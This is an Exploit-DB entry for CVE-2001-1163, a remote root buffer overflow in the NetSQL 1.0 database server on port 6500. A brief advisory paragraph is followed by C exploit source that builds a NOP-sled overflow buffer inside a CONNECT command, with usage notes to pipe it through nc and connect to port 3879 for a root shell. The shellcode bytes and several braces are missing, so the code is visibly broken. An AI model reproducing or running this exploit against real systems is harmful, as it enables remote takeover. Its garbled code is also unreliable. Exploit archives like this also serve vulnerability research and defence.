NetSQL 1.0 - Remote Buffer Overflow Vulnerability

ID EDB-ID:20936
Type exploitdb
Reporter Sergio Monteiro
Modified 2001-06-15T00:00:00


NetSQL 1.0 Remote Buffer Overflow Vulnerability. CVE-2001-1163. Remote exploit for linux platform


NetSQL is an implementation of a database and toolset distributed by Munica Corporation. NetSQL is part of 5 piece software package called the Webpak, containing utilities for features such as web boards, membership, and online calendars.

A buffer overflow in the server makes it possible for a remote user to gain remote root access to a system using the affected software. By sending a long string to port 6500, a remote user can create a buffer overflow, allowing code execution.

This makes it possible for a remote user to gain remote root access, resulting in complete compromise of a system using the affected software.

 * Remote exploit for NetSQL server, by Sergio Monteiro a.k.a Papa-tudo 
 * netsqld - An SQL database server with Web interface
 * check .
 * There is an easily exploitable buffer overflow in netsql.
 * This exploit was tested on redhat 6.2. 
 * Run like: ./netsql | nc 6500 
 * Then connect to port 3879 for the rootshell.
 * Greets:
 * Author: Papa-tudo - 

#include <stdio.h>
#include <string.h>

#define RET 0xbffea3d0

char crap[80];
char cmd[1024];

char shellcode[] =

main (int argc, char *argv[])


char *buf;
int bsize=180, offset = 0, len = 151, i;

  if (argc > 1) bsize  = atoi(argv[1]);
  if (argc > 2) offset = atoi(argv[2]);
  if (argc > 3) len = atoi(argv[3]);

  buf = malloc(bsize);

  memset (buf, '\x90', bsize);
  memset(crap, '\x41', 80);

       for (i = len; i < bsize - 4; i += 4)
      *(long *) &buf[i] = RET + offset;

  memcpy (buf + (len - strlen (shellcode)), shellcode, strlen (shellcode));

  crap[sizeof(crap)] = '\0';
  buf[bsize - 1] = '\0';

  fprintf(stderr, "Return Address = 0x%x\n", RET + offset);
  fprintf(stderr, "Running with offset %d\n", offset);

printf("76 CONNECT %s ON %s USER=\'netsql\' PASSWORD=\'none\'\n", crap, buf);